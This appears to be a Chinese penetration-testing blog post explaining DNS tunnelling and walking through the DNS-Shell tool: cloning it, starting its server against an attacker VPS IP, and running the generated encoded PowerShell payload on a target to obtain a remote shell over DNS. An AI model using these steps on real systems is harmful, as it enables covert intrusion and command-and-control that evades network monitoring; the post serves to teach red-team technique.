内网转发及隐蔽隧道 | 使用DNS进行命令控制(DNS-Shell)

Gcow安全团队

共 1570字,需浏览 4分钟

 ·

2020-11-09 00:10

使用DNS进行命令控制(DNS-Shell)


目录

DNS隧道

    利用DNS进行命令控制(DNS-Shell)

        DNS-Shell的使用



DNS隧道

DNS协议是一种请求、应答协议,也是一种可用于应用层的隧道技术。DNS隧道的工作原理很简单,在进行DNS查询时,如果查询的域名不在DNS服务器本机缓存中,就会访问互联网进行查询,然后返回结果。如果在互联网上有一台定制的服务器,那么依靠DNS协议即可进行数据包的交互。从DNS协议的角度来看,这样的操作只是在一次次地查询某个特定的域名并得到解析结果,但其本质问题是,预期的返回结果应该是一个IP地址,而事实上返回的可以是任意的字符串,包括加密的C&C指令。

在使用DNS隧道与外部进行通信时,从表面上看是没有连接外网的(内网网关没有转发IP数据包)。但实际上,内网的DNS服务器进行了中转操作。这就是DNS隧道的工作原理,简单地说,就是将其他协议封装在DNS协议中进行传输。



利用DNS进行命令控制(DNS-Shell)

DNS-Shell是一款通过DNS信道实现交互式Shell的强大工具,该工具的服务器端基于Python开发,可以任何一种安装了Python环境的操作系统平台上运行,工具所使用的Payload均已PowerShell命令进行编码,保证了在不同平台间运行的稳定性和兼容性。

DNS-Shell运行机制

该工具所使用的Payload会在服务器端脚本被调用时自动生成,Payload会使用nslookup来向服务器端查询和请求新的操作命令,接下来服务器端会监听端口53并等待传入的连接。当Payload在目标设备上成功执行后,服务器端将会生成一个交互式Shell并提供给用户进行操作。

通信信道建立成功后,Payload会继续向服务器查询和请求新的操作指令,当攻击者在服务器端输入新的操作命令后,Payload将会收到命令并执行该命令,然后在命令执行成功后将执行结果返回给服务器端。



DNS-Shell的使用

DNS-Shell的运行相对来说比较简单,DNS-Shell支持两种操作模式,即 直接操作模式 和 递归模式:

下载DNS-Shell:

git clone https://github.com/sensepost/DNS-Shell.git


DNS-Shell直接模式:

python2 DNS-Shell.py -l -d VPS的IP


该命令会生成一段payload

我们将该payload复制,在目标机cmd窗口中执行 

powershell.exe -e 生成的payload

可以看到,我们已经成功接收到反弹回来的shell了

相关文章:

       内网转发及隐蔽隧道 | 使用ICMP进行命令控制(Icmpsh)

       内网转发及隐蔽隧道 | 使用SSH做端口转发以及反向隧道

       内网转发及隐蔽隧道 | 端口转发和端口映射

       内网渗透 | 内网转发工具的使用

   内网转发及隐蔽隧道 | 网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel)

参考文章:

利用DNS隧道构建隐蔽C&C信道

DNS-Shell:一款通过DNS信道来实现交互式Shell的强大工具    

DNS Shell 一款控制服务器的工具 




责编:vivian

来源:谢公子博客






如果文中有错误的地方,欢迎指出。有想转载的,可以留言我加白名单。
最后,欢迎加入谢公子的小黑屋(安全交流群)(QQ群:783820465)





浏览 47
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报